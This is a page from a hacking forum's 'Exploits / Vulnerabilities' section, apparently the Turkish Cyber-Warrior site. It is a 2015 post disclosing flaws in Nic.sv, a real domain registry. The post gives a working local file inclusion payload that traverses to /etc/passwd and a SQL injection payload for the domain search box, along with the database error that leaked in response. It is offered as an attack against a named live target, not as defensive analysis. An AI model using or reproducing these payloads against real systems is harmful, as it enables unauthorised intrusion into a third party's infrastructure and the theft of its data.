ROOT
FORUM ROOT
PORTAL ROOT
CYBER NAVIGATION
DÖKÜMANLAR
DÖKÜMAN EKLE
DOWNLOAD/DOSYA ARSIVI
BASINDA CW
CYBER ACADEMY
ORGANIZASYON
NELER YAPTIK?
OPERASYON YÖNETIM SISTEMI
GÖREV ORG. BASVURU
YÖNETICI BASVURU FORMU
MISYON
KURALLAR
KEFALET
KEFIL HAVUZU
MEMBER NAVIGATION
YENI ÜYE BASVURU
PROFIL
MEMBER NETWORK
SIFREMI UNUTTUM
ÖZEL MESAJLARIM
ONAY E-POSTA GÖNDER
Root
>
Exploits / Vulnerabilities
> Nic.sv Offical
Nic.sv Offical | Cyber-Warrior Information Technology's World
Madde
Author :
Bug Researchers
Date :
23.10.2015 13:46:16
#
Nic.sv Offical
[Full Screen Display]
<------------------ header data start ------------------- > ############################################################# # Application Name : Nic.sv Offical # Vulnerable Type : LFI and SQL # Author : d4rkvisuaL # Target 1 LFI Payload : payload : svnet.php?url=../../../../../../../../../../../../../../../../../../etc/passwd # Target 2 SQL Injection: Buscar Dominio Post Box Payload: 1’ ’OR’ You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ’.com.sv’ AND (ESTADO_SUBDOMINIO=’Registrado’ OR ESTADO_SUBDOMINIO=’En renovacion’ at line 1 #############################################################
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©